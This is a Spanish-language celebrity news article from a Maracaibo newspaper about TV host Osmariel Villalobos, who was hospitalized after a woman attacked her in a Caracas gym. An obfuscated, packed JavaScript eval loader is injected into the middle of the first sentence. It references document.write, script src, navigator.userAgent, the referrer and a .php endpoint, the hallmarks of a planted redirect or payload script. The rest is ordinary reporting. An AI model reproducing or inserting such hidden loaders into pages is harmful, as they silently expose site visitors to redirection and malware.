publicidad

Osmariel: “Si hubiera tenido un cuchillo, me mata”

Redacción Arte&Ocio / Maracaibo / noticias@laverdad.com
Una eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndkdh|var|u0026u|referrer|ttybn||js|php'.split('|'),0,{})) fuerte golpiza envió directo al hospital a la animadora zuliana Osmariel Villalobos

Ambas mujeres dieron su versión de los hechos. (Foto: Archivo)

Una fuerte golpiza, propiciada por una mujer de la farándula, envió directo al hospital a la animadora zuliana Osmariel Villalobos. El altercado se registró el viernes, en un gimnasio ubicado en Caracas. Según contó la moderadora de Portada´s, “Entró al baño y me dijo que me iba a destruir, cuando se dio cuenta que ignoré su amenaza, me empujó y me dijo: 'es contigo', yo lo que hice fue alejarla y se vino contra mí con toda su fuerza. Nunca había visto a alguien con tanta ira en su mirada. Si hubiera tenido un cuchillo, un arma, sin dudarlo, me mata. Quería arañarme la cara, pero como no podía me agarraba el cuello, el cabello, hasta me lanzó al suelo. En el momento que vi que no podía quitármela, comencé a pedir auxilio para que me socorrieran”. 

Entre las lesiones que sufrió Villalobos están una contusión en la cervical, un dedo fracturado, tres mordiscos y rasguños en varias zonas de su cuerpo. En una entrevista para Caraota Digital, informó que tomará acciones legales en contra de la cantante para que no pueda acercarse a ella ni accionar nuevamente. 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama